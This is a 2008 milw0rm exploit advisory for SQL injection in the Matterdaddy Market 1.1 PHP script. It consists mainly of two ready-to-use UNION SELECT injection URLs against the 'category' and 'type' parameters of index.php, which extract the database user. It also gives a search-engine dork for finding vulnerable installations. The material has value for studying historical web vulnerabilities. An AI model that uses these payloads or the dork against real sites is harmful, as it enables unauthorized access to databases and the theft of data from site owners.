Matterdaddy Market 1.1 - 'index.php' Multiple SQL Injections

Author: ~!Dok_tOR!~
Contact: coder5(at)topmail.kz 
Home Page: www.antichat.ru
Date found: 25.08.08
Product: Market
Version: 1.1
Download script: http://www.matterdaddy.com/4/scripts/market_v1_1.zip
Vulnerability Class: SQL Injection

magic_quotes_gpc = Off

http://localhost/[installdir]/

Exploit:

index.php?category='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
index.php?type='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*

Dork:

made by matterdaddy

# milw0rm.com [2008-08-25]